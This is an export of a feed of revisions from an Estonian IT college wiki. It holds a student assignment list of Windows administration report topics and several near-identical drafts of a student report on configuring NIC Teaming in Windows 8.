* Referaat: [[Disk2vhd]]&lt;br /&gt;
* Arvustus1: [https://wiki.itcollege.ee/index.php/Talk:Windows_Defender Windows Defender]&lt;br /&gt;
* Arvustus2: [https://wiki.itcollege.ee/index.php/Talk:Boot_Configuration_Data BCD]&lt;br /&gt;
&lt;br /&gt;
= Raigo Trei =&lt;br /&gt;
* Referaat: [[Windows 7 Upgrade Advisor]]&lt;br /&gt;
* Arvustus1:&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
= Robert Pärn =&lt;br /&gt;
* Referaat: [[Special identity]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Dynamic_disk&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:DISKPART&lt;br /&gt;
&lt;br /&gt;
= Kristjan Karu =&lt;br /&gt;
* Referaat: [[Draiverite haldus Windows 7 operatsioonisüsteemis]]&lt;br /&gt;
* Arvustus1:&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Iti Liivik=&lt;br /&gt;
* Referaat: [[Effective permissions]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Draiverite_haldus_Windows_7_operatsioonis%C3%BCsteemis&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Windows_7_Homegroup_and_sharing&lt;br /&gt;
&lt;br /&gt;
=Dmitri Keler=&lt;br /&gt;
* Referaat: [[System restore point]]&lt;br /&gt;
* Arvustus1: &lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Jevgeni Pogodin=&lt;br /&gt;
* Referaat: [[FAT32]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:WAIK&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Andres Pihlak=&lt;br /&gt;
* Referaat: [[Windows Virtual PC]]&lt;br /&gt;
* Arvustus1: &lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Deniss Ruzanov=&lt;br /&gt;
* Referaat: [[IPv6 võrguparameetrite seadistamine]]&lt;br /&gt;
* Arvustus1: &lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Martin Aarne=&lt;br /&gt;
* Referaat: [[Windows User State Migration Tool (USMT)]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php/Talk:AppLocker#Martin_Aarne_D22&lt;br /&gt;
* Arvustus 2: https://wiki.itcollege.ee/index.php/Talk:WAIK#Martin_Aarne_D22&lt;br /&gt;
&lt;br /&gt;
=Matis Alliksoo=&lt;br /&gt;
* Referaat: [[Windows 8 NIC Teaming]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php/Talk:Windows_Virtual_PC&lt;br /&gt;
* Arvustus 2:&lt;br /&gt;
&lt;br /&gt;
= Richard Teppart =&lt;br /&gt;
* Referaat: [[Volume shadow copies]]&lt;br /&gt;
* Arvestus 1: &lt;br /&gt;
* Arvestus 2:&lt;br /&gt;
&lt;br /&gt;
= Igor Pavlov =&lt;br /&gt;
* Referaat: [[Windows Defender]]&lt;br /&gt;
* Arvustus 1: &lt;br /&gt;
* Arvustus 2: &lt;br /&gt;
&lt;br /&gt;
= Taavi Podzuks =&lt;br /&gt;
* Referaat: [[Windows juhend: Kuidas paigaldata täiendavaid (juur)sertfikaate]]&lt;br /&gt;
* Arvustus1:&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Kersti Lang=&lt;br /&gt;
* Referaat: [[Windows 7]]&lt;br /&gt;
* Arvestus 1:&lt;br /&gt;
* Arvestus 2:&lt;br /&gt;
&lt;br /&gt;
= Gert Häusler =&lt;br /&gt;
* Referaat: [[Windows Biometric Framework]]&lt;br /&gt;
* Arvestus 1: &lt;br /&gt;
* Arvestus 2:&lt;br /&gt;
&lt;br /&gt;
= Erki Miilberg =&lt;br /&gt;
* Referaat: [[Windows operatsioonisüsteemi paigaldus]]&lt;br /&gt;
* Arvustus 1: &lt;br /&gt;
* Arvustus 2:&lt;br /&gt;
&lt;br /&gt;
= Rasmus Tetsmann=&lt;br /&gt;
* Referaat: [[Windows 7 Homegroup and sharing]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php/Talk:Windows_8_-_mida_uut&lt;br /&gt;
* Arvustus 2: https://wiki.itcollege.ee/index.php/Talk:Windows_juhend:_Kuidas_%C3%BChele_USB_m%C3%A4luseadmele_korraga_x86_ja_x64_Windows_7_paigaldamiseks_vajalik&lt;br /&gt;
&lt;br /&gt;
= Lauri Rüütli =&lt;br /&gt;
* Referaat: [[Windows juhend: Kuidas paigaldada täiendavaid draivereid]]&lt;br /&gt;
* Arvestus 1: https://wiki.itcollege.ee/index.php/Talk:DISKPART&lt;br /&gt;
* Arvestus 2: https://wiki.itcollege.ee/index.php/Talk:WAIK&lt;br /&gt;
&lt;br /&gt;
= Taavi Zeiger =&lt;br /&gt;
* Referaat: [[Disk Defragmenter]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:CHKDSK&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Offline_files&lt;br /&gt;
&lt;br /&gt;
= Kimmo Lillipuu =&lt;br /&gt;
* Referaat: [[Windows Remote Management]]&lt;br /&gt;
* Arvestus 1: https://wiki.itcollege.ee/index.php/Talk:Windows_7&lt;br /&gt;
* Arvestus 2: https://wiki.itcollege.ee/index.php/Talk:Windows_operatsioonisüsteemi_paigaldus&lt;br /&gt;
&lt;br /&gt;
= Heigo Punapart =&lt;br /&gt;
* Referaat: [[Incremental backup]]&lt;br /&gt;
* Arvestus 1: https://wiki.itcollege.ee/index.php/Talk:Sysprep&lt;br /&gt;
* Arvestus 2: https://wiki.itcollege.ee/index.php/Talk:Windows_PE&lt;br /&gt;
&lt;br /&gt;
= Velmar Piibeleht =&lt;br /&gt;
* Referaat: [[BitLocker To Go]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php/Talk:Skydrive#Velmar_Piibeleht&lt;br /&gt;
* Arvustus 2: https://wiki.itcollege.ee/index.php/Talk:Windows_juhend:_Kuidas_t%C3%B5sta_seadmete_draivereid_%C3%BChes_arvutist_teise&lt;br /&gt;
&lt;br /&gt;
= Alo Konno =&lt;br /&gt;
* Referaat: [[Windows 8 - mida uut]]&lt;br /&gt;
* Arvustus 1: &lt;br /&gt;
* Arvustus 2:&lt;br /&gt;
&lt;br /&gt;
= Andre- Marcel Peri =&lt;br /&gt;
* Referaat: [[AppLocker]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php/Talk:Windows_7&lt;br /&gt;
* Arvustus 2:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*[[ Windows PE]]-Marek Lepla&lt;br /&gt;
*[[ Workgroup]] - Ragnar Kullamäe&lt;br /&gt;
&lt;br /&gt;
= Gertti-Vena Rätsep =&lt;br /&gt;
* Referaat: [[VPN &amp;amp; SVPN]]&lt;br /&gt;
* Arvestus 1: &lt;br /&gt;
* Arvestus 2:&lt;br /&gt;
&lt;br /&gt;
= Kalju Hõbemäe =&lt;br /&gt;
* Referaat: [[Math Input Panel]]&lt;br /&gt;
* Arvestus 1: https://wiki.itcollege.ee/index.php/Talk:Math_Input_Panel&lt;br /&gt;
* Arvestus 2:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Karl Krasilnikov =&lt;br /&gt;
* Referaat: [[PnPUtil]]&lt;br /&gt;
* Arvestus 1: &lt;br /&gt;
* Arvestus 2:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Sander Saarm =&lt;br /&gt;
&lt;br /&gt;
* Referaat: [[Toiteseadete seadistamine Windows 7 operatsioonisüsteemis]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php/Talk:Windows_juhend:_Kuidas_ekraanipilti_hallata_(keeramised,_p%C3%B6%C3%B6ramised,_lahutusv%C3%B5ime_ja_lisaekraanid)&lt;br /&gt;
* Arvustus 2: https://wiki.itcollege.ee/index.php/Talk:Disk_Defragmenter&lt;br /&gt;
&lt;br /&gt;
= Carolys Kallas =&lt;br /&gt;
&lt;br /&gt;
* Referaat: [[Powercfg.exe]]&lt;br /&gt;
* Arvustus 1: &lt;br /&gt;
* Arvustus 2:&lt;br /&gt;
&lt;br /&gt;
= Kairo Koik =&lt;br /&gt;
* Referaat: [[Windows juhend: Kuidas ekraanipilti hallata (keeramised, pööramised, lahutusvõime ja lisaekraanid)]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php/Talk:GPT&lt;br /&gt;
* Arvustus 2: https://wiki.itcollege.ee/index.php/Talk:Sysprep&lt;br /&gt;
&lt;br /&gt;
= Marek Lepla =&lt;br /&gt;
* Referaat: [[Windows PE]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php?title=Talk:Windows_juhend:_Kuidas_paigaldada_uuendusi_kujutisfaili_DISM_t%C3%B6%C3%B6riista_abil&amp;amp;action=edit&amp;amp;redlink=1 &lt;br /&gt;
* Arvustus 2: https://wiki.itcollege.ee/index.php?title=Talk:Incremental_backup&amp;amp;action=edit&amp;amp;redlink=1&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Windows_Virtual_PC&amp;diff=38656</id>
		<title>Talk:Windows Virtual PC</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Windows_Virtual_PC&amp;diff=38656"/>
		<updated>2011-10-17T14:31:12Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: Created page with &amp;#039;=Matis Alliksoo=  &amp;#039;&amp;#039;&amp;#039;Sisu:&amp;#039;&amp;#039;&amp;#039;  &amp;#039;&amp;#039;&amp;#039;Kujundus:&amp;#039;&amp;#039;&amp;#039;  &amp;#039;&amp;#039;&amp;#039;Juhendi kavaliteet:&amp;#039;&amp;#039;&amp;#039;  &amp;#039;&amp;#039;&amp;#039;Viitamine:&amp;#039;&amp;#039;&amp;#039;  &amp;#039;&amp;#039;&amp;#039;Eriti meeldis:&amp;#039;&amp;#039;&amp;#039;&amp;#039;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Matis Alliksoo=&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Sisu:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kujundus:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Juhendi kavaliteet:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Viitamine:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Eriti meeldis:&#039;&#039;&#039;&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=38026</id>
		<title>Windows 8 NIC Teaming</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=38026"/>
		<updated>2011-10-10T21:00:39Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tutvustus ==&lt;br /&gt;
&lt;br /&gt;
NIC teaming on protsess mis võimaldab grupeerida mitut erinevat füüsilist võrgukaarti üheks loogiliseks võrgukaardiks. See protsess võimaldab suurendada vigade tolerantsi ja edastuskiiruse tasakaalu. Kogu võrgukaartide grupeerimise protsessi kutsutaksegi „teaminguks“. Teamingul on kaks eesmärki:&lt;br /&gt;
*&#039;&#039;&#039;Vigade tolerants:&#039;&#039;&#039; Ühendades vähemalt kaks võrgukaarti üheks loogiliseks võrgukaardiks kasvab võrgu töökindlus märgatavalt. &lt;br /&gt;
*&#039;&#039;&#039;Kiiruse tasakaal:&#039;&#039;&#039; Tasakaalustades võrguliiklust saab suurendada serveri ja võrgu funktsionaalsust. Paketid, mis liiguvad, saadetakse ja võetakse vastu läbi kõikide võimalike võrguseadmete.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== NIC Teaming enne Windows 8-t ==&lt;br /&gt;
NIC Teamingut oli varem võimalik ainult teiste erinevate edasimüüjate poolt saada. Microsoft ei taganud sellele mingisugust tuge läbi „Microsoft Product Support Service“. Selle tulemusena peale mingit uuendust ei pruukinud ka NIC Teaming enam töötada. Tihti ei olnud võimalik ka mitme erineva tarnija võrgukaarte kokku team&#039;ida.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Windows 8 NIC Teaming ==&lt;br /&gt;
Windows 8 tuleb välja kohe sisseehitatud NIC Teaminguga, ehk ei pea hakkama mingisuguseid installimisi tegema või eri tarkvara konfigureerima, mis on mingi teise edasimüüja NIC Teamingu süsteem ja mis omakorda ei oleks Microsofti poolt toetatud. Nüüd saab Windows 8-ga team&#039;ida kahte või enamat võrgukaarti isegi siis, kui need on erinevate firmade/tootjate poolt tehtud. Veelgi enam, saab seda teami ühendada Hyper-V Virtuaalsete Arvutitega. See on ka üks enim tahetud omadus. Väga oluline on NIC Teaming just „High Availability“ keskkondades, ehk seal, kus võrgu ühenduse olemasolek on kriitiliselt vajalik koguaeg. Tähele tuleks panna aga seda, et see on hetkel veel eelvaade Windows 8-st. Seega võib Microsoft seda veel erinevat pidi täiendada või muuta.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Kuidas konfigureerida ==&lt;br /&gt;
NIC Teaming&#039;ut on võimalik konfigureerida nii läbi GUI kui ka läbi PowerShelli. PowerShellis saab NIC Teaming&#039;ut ka valmis vastustega ära seadistada, mis teeb paigalduse vajadusel veelgi lihtsamaks.&lt;br /&gt;
Näide konfigureerimiseks läbi Windowsi graafilise liidese:&lt;br /&gt;
* Alustada tuleb Server manager liidesest, kus on võimalik näha võrguliidest, hetkel olemas olevaid teame jm. Task&#039;ide alt tuleb valida &amp;quot;New Team&amp;quot;. See käivitab viisardi uue teami tegemiseks.&lt;br /&gt;
[[File:NIC_t3.jpg|800x600px]]&lt;br /&gt;
----&lt;br /&gt;
* Ette tuleb viisardi aken, kuhu tuleb sisestada soovitud uue teami nimi ja valida valikust vajalikud võrguadapterid. Antud adapterid siis lisatakse teami.&lt;br /&gt;
[[File:NIC_t4.jpg|800x600px]]&lt;br /&gt;
----&lt;br /&gt;
* OK vajutades läheb hetk aega ja siis ilmub &amp;quot;Teams&amp;quot; listi uus team eelnevalt sisestatud nimega.&lt;br /&gt;
Peale valmimist on võimalik ka näha teami staatust koos erinevate andmetega. Nii vähe ongi vaja, et teha valmis NIC Teaming uues tulevases Windowsis.&lt;br /&gt;
[[File:NIC_t5b.jpg]]&lt;br /&gt;
----&lt;br /&gt;
* Minnes arvuti &amp;quot;Network Connections&amp;quot; alla on näha, et sinna on tekkinud juurde uus võrk.&lt;br /&gt;
[[File:NIC_t6b.jpg]]&lt;br /&gt;
[[File:NIC_t7b.jpg]]&lt;br /&gt;
----&lt;br /&gt;
* Antud pildi pealt on näha, kuidas teami &amp;quot;DemoTeam&amp;quot; staatuses on Warning. Pildilt on ka näha, et üks võrgukaartidest on lahti ühendatud, kuid tänu NIC Teaming&#039;ule toimib võrguühendus ikka sama moodi edasi. Pingimine ei katke, ega ka failide kopeerimine või downloadimine.&lt;br /&gt;
[[File:NIC_Teaming.JPG|800x600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Kasutatud materjalid ==&lt;br /&gt;
* Windows Server 8 - Sneak Peek WPC 2011 - HyperV Replica - http://www.youtube.com/watch?v=Xz9f2G7drEg&amp;amp;feature=related &lt;br /&gt;
* http://www.aidanfinn.com/?p=11787&lt;br /&gt;
* http://workinghardinit.wordpress.com/2011/09/21/windows-8-server-developer-preview-nic-teaming-in-the-operating-system-works-just-fine/&lt;br /&gt;
* http://virtualisationandmanagement.wordpress.com/2011/09/16/windows-8-server-native-support-for-nic-teaming/&lt;br /&gt;
* http://blog.concurrency.com/infrastructure/windows-8-nic-teaming-and-networking/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Koostas ==&lt;br /&gt;
Matis Alliksoo A22&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=38009</id>
		<title>Windows 8 NIC Teaming</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=38009"/>
		<updated>2011-10-10T20:43:53Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tutvustus ==&lt;br /&gt;
&lt;br /&gt;
NIC teaming on protsess mis võimaldab grupeerida mitu erinevat füüsilist võrgukaarti üheks loogiliseks võrgukaardiks. See protsess võimaldab suurendada vigade tolerantsi ja edastus kiiruse tasakaalu. Kogu võrgukaartude grupeerimise protsessi kutsutaksegi „teaminguks“. Teamingul on kaks eesmärki:&lt;br /&gt;
*&#039;&#039;&#039;Vigade tolerants:&#039;&#039;&#039; Ühendades vähemalt kaks võrgukaarti üheks loogiliseks võrgukaardiks kasvab võrgu töökindlus märgatavalt. &lt;br /&gt;
*&#039;&#039;&#039;Kiiruse tasakaal:&#039;&#039;&#039; Tasakaalustades võrguliiklust saab suurendada serveri ja võrgu funktsionaalsust. Paketid mis liiguvad saadetakse ja võetakse vastu läbi kõikide võimalike võrguseadmete.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== NIC Teaming enne Windows 8-t ==&lt;br /&gt;
NIC Teamingut oli varem võimalik ainult teiste erinevate edasimüüjate poolt saada. Microsoft ei taganud sellele mingisugust tuge läbi „Microsoft Product Support Service“. Selle tulemusena peale mingit uuendust ei pruukinud ka NIC Teaming enam töötada. Tihti ei olnud võimalik ka mitme erineva tarnija võrgukaarte kokku teamida.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Windows 8 NIC Teaming ==&lt;br /&gt;
Windows 8 tuleb välja kohe sisseehitatud NIC Teaminguga. Ehk ei pea hakkama mingisuguseid intsallimisi tegema või eri tarkvara konfigureerima, mis on mingi teise edasimüüja NIC Teamingu süsteem ja mis omakorda ei oleks Microsofti poolt toetatud. Nüüd saab Windows 8-ga teamida 2 või enam võrgukaarte isegi siis, kui need on erinevate firmade/tootjate poolt tehtud. Veelgi enam, saab seda teami ühendada Hyper-V Virtuaalsete Arvutitega. See on ka üks enim tahetud omadus. Väga oluline on NIC Teaming just „High Availability“ keskkondades, ehk seal kus võrgu ühenduse olemasolek on kriitiliselt vajalik kogu aeg. Tähele tuleks panna aga seda, et see on hetkel veel eelvaade Windows 8-st. Seega võib Microsoft seda veel erinevat pidi täiendada või muuta.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Kuidas konfigureerida ==&lt;br /&gt;
NIC Teamingut on võimalik konfigureerida läbi GUI kui ka läbi PowerShelli. PowerShellis saab NIC Teamingut ka valmis vastustega ära seadistada, mis teeb paigalduse vajadusel veelgi lihtsamaks.&lt;br /&gt;
Näide konfigureerimiseks läbi Windowsi graafilise liidese:&lt;br /&gt;
* Alustada tuleb Server manager liidesest, kus on võimalik näha võrguliidest, hetkel olemas olevaid teame jm. Taskide alt tuleb valida &amp;quot;New Team&amp;quot;. See käivitab viisardi uue teami tegemiseks.&lt;br /&gt;
[[File:NIC_t3.jpg|800x600px]]&lt;br /&gt;
----&lt;br /&gt;
* Ette tuleb viisardi aken, kuhu tuleb sisestada soovitud uue teami nimi ja valida valikust vajalikud võrguadapterid. Antud adapterid siis lisatakse teami.&lt;br /&gt;
[[File:NIC_t4.jpg|800x600px]]&lt;br /&gt;
----&lt;br /&gt;
* OK vajutades läheb hetk aega ja siis ilmub &amp;quot;Teams&amp;quot; listi uus team eelnevalt sisestatud nimega.&lt;br /&gt;
Peale valmimist on võimalik ka näha teami staatust koos erinevate andmetega. Nii vähe ongi vaja, et teha valmis NIC Teaming uues tulevas Windowsis.&lt;br /&gt;
[[File:NIC_t5b.jpg]]&lt;br /&gt;
----&lt;br /&gt;
* Minnes arvuti &amp;quot;Network Connections&amp;quot; alla on näha, et sinna on tekkinud juurde uus võrk.&lt;br /&gt;
[[File:NIC_t6b.jpg]]&lt;br /&gt;
[[File:NIC_t7b.jpg]]&lt;br /&gt;
----&lt;br /&gt;
* Antud pildi pealt on näha, kuidas teami &amp;quot;DemoTeam&amp;quot; staatuses on Warning. Pildilt on ka näha, et üks võrgukaartidest on lahti ühendatud, kuid tänu NIC Teamingule toimib võrguühendus ikka sama moodi edasi. Pingimine ei katke, ega ka failide kopeerimine või downloadimine.&lt;br /&gt;
[[File:NIC_Teaming.JPG|800x600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Kasutatud materjalid ==&lt;br /&gt;
* Windows Server 8 - Sneak Peek WPC 2011 - HyperV Replica - http://www.youtube.com/watch?v=Xz9f2G7drEg&amp;amp;feature=related &lt;br /&gt;
* http://www.aidanfinn.com/?p=11787&lt;br /&gt;
* http://workinghardinit.wordpress.com/2011/09/21/windows-8-server-developer-preview-nic-teaming-in-the-operating-system-works-just-fine/&lt;br /&gt;
* http://virtualisationandmanagement.wordpress.com/2011/09/16/windows-8-server-native-support-for-nic-teaming/&lt;br /&gt;
* http://blog.concurrency.com/infrastructure/windows-8-nic-teaming-and-networking/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Koostas ==&lt;br /&gt;
Matis Alliksoo A22&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=37998</id>
		<title>Windows 8 NIC Teaming</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=37998"/>
		<updated>2011-10-10T20:38:30Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tutvustus ==&lt;br /&gt;
&lt;br /&gt;
NIC teaming on protsess mis võimaldab grupeerida mitu erinevat füüsilist võrgukaarti üheks loogiliseks võrgukaardiks. See protsess võimaldab suurendada vigade tolerantsi ja edastus kiiruse tasakaalu. Kogu võrgukaartude grupeerimise protsessi kutsutaksegi „teaminguks“. Teamingul on kaks eesmärki:&lt;br /&gt;
*&#039;&#039;&#039;Vigade tolerants:&#039;&#039;&#039; Ühendades vähemalt kaks võrgukaarti üheks loogiliseks võrgukaardiks kasvab võrgu töökindlus märgatavalt. &lt;br /&gt;
*&#039;&#039;&#039;Kiiruse tasakaal:&#039;&#039;&#039; Tasakaalustades võrguliiklust saab suurendada serveri ja võrgu funktsionaalsust. Paketid mis liiguvad saadetakse ja võetakse vastu läbi kõikide võimalike võrguseadmete.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== NIC Teaming enne Windows 8-t ==&lt;br /&gt;
NIC Teamingut oli varem võimalik ainult teiste erinevate edasimüüjate poolt saada. Microsoft ei taganud sellele mingisugust tuge läbi „Microsoft Product Support Service“. Selle tulemusena peale mingit uuendust ei pruukinud ka NIC Teaming enam töötada. Tihti ei olnud võimalik ka mitme erineva tarnija võrgukaarte kokku teamida.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Windows 8 NIC Teaming ==&lt;br /&gt;
Windows 8 tuleb välja kohe sisseehitatud NIC Teaminguga. Ehk ei pea hakkama mingisuguseid intsallimisi tegema või eri tarkvara konfigureerima, mis on mingi teise edasimüüja NIC Teamingu süsteem ja mis omakorda ei oleks Microsofti poolt toetatud. Nüüd saab Windows 8-ga teamida 2 või enam võrgukaarte isegi siis, kui need on erinevate firmade/tootjate poolt tehtud. Veelgi enam, saab seda teami ühendada Hyper-V Virtuaalsete Arvutitega. See on ka üks enim tahetud omadus. Väga oluline on NIC Teaming just „High Availability“ keskkondades, ehk seal kus võrgu ühenduse olemasolek on kriitiliselt vajalik kogu aeg. Tähele tuleks panna aga seda, et see on hetkel veel eelvaade Windows 8-st. Seega võib Microsoft seda veel erinevat pidi täiendada või muuta.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Kuidas konfigureerida ==&lt;br /&gt;
NIC Teamingut on võimalik konfigureerida läbi GUI kui ka läbi PowerShelli. PowerShellis saab NIC Teamingut ka valmis vastustega ära seadistada, mis teeb paigalduse vajadusel veelgi lihtsamaks.&lt;br /&gt;
Näide konfigureerimiseks läbi Windowsi graafilise liidese:&lt;br /&gt;
* Alustada tuleb Server manager liidesest, kus on võimalik näha võrguliidest, hetkel olemas olevaid teame jm. Taskide alt tuleb valida &amp;quot;New Team&amp;quot;. See käivitab wizardi uue teami tegemiseks.&lt;br /&gt;
[[File:NIC_t3.jpg|800x600px]]&lt;br /&gt;
----&lt;br /&gt;
* Ette tuleb wizardi aken, kuhu tuleb sisestada soovitud uue teami nimi ja valida valikust vajalikud võrguadapterid. Antud adapterid siis lisatakse teami.&lt;br /&gt;
[[File:NIC_t4.jpg|800x600px]]&lt;br /&gt;
----&lt;br /&gt;
* OK vajutades läheb hetk aega ja siis ilmub &amp;quot;Teams&amp;quot; listi uus team eelnevalt sisestatud nimega.&lt;br /&gt;
Peale valmimist on võimalik ka näha teami staatust koos erinevate andmetega. Nii vähe ongi vaja, et teha valmis NIC Teaming uues tulevas Windowsis.&lt;br /&gt;
[[File:NIC_t5b.jpg]]&lt;br /&gt;
----&lt;br /&gt;
* Minnes arvuti &amp;quot;Network Connections&amp;quot; alla on näha, et sinna on tekkinud juurde uus võrk.&lt;br /&gt;
[[File:NIC_t6b.jpg]]&lt;br /&gt;
[[File:NIC_t7b.jpg]]&lt;br /&gt;
----&lt;br /&gt;
* Antud pildi pealt on näha, kuidas teami &amp;quot;DemoTeam&amp;quot; staatuses on Warning. Pildilt on ka näha, et üks võrgukaartidest on lahti ühendatud, kuid tänu NIC Teamingule toimib võrguühendus ikka sama moodi edasi. Pingimine ei katke, ega ka failide kopeerimine või downloadimine.&lt;br /&gt;
[[File:NIC_Teaming.JPG|800x600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Kasutatud materjalid ==&lt;br /&gt;
* Windows Server 8 - Sneak Peek WPC 2011 - HyperV Replica - http://www.youtube.com/watch?v=Xz9f2G7drEg&amp;amp;feature=related &lt;br /&gt;
* http://www.aidanfinn.com/?p=11787&lt;br /&gt;
* http://workinghardinit.wordpress.com/2011/09/21/windows-8-server-developer-preview-nic-teaming-in-the-operating-system-works-just-fine/&lt;br /&gt;
* http://virtualisationandmanagement.wordpress.com/2011/09/16/windows-8-server-native-support-for-nic-teaming/&lt;br /&gt;
* http://blog.concurrency.com/infrastructure/windows-8-nic-teaming-and-networking/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Koostas ==&lt;br /&gt;
Matis Alliksoo A22&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=37995</id>
		<title>Windows 8 NIC Teaming</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Windows_8_NIC_Teaming&amp;diff=37995"/>
		<updated>2011-10-10T20:37:09Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Tutvustus ==&lt;br /&gt;
&lt;br /&gt;
NIC teaming on protsess mis võimaldab grupeerida mitu erinevat füüsilist võrgukaarti üheks loogiliseks võrgukaardiks. See protsess võimaldab suurendada vigade tolerantsi ja edastus kiiruse tasakaalu. Kogu võrgukaartude grupeerimise protsessi kutsutaksegi „teaminguks“. Teamingul on kaks eesmärki:&lt;br /&gt;
*&#039;&#039;&#039;Vigade tolerants:&#039;&#039;&#039; Ühendades vähemalt kaks võrgukaarti üheks loogiliseks võrgukaardiks kasvab võrgu töökindlus märgatavalt. &lt;br /&gt;
*&#039;&#039;&#039;Kiiruse tasakaal:&#039;&#039;&#039; Tasakaalustades võrguliiklust saab suurendada serveri ja võrgu funktsionaalsust. Paketid mis liiguvad saadetakse ja võetakse vastu läbi kõikide võimalike võrguseadmete.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== NIC Teaming enne Windows 8-t ==&lt;br /&gt;
NIC Teamingut oli varem võimalik ainult teiste erinevate edasimüüjate poolt saada. Microsoft ei taganud sellele mingisugust tuge läbi „Microsoft Product Support Service“. Selle tulemusena peale mingit uuendust ei pruukinud ka NIC Teaming enam töötada. Tihti ei olnud võimalik ka mitme erineva tarnija võrgukaarte kokku teamida.&lt;br /&gt;
&lt;br /&gt;
== Windows 8 NIC Teaming ==&lt;br /&gt;
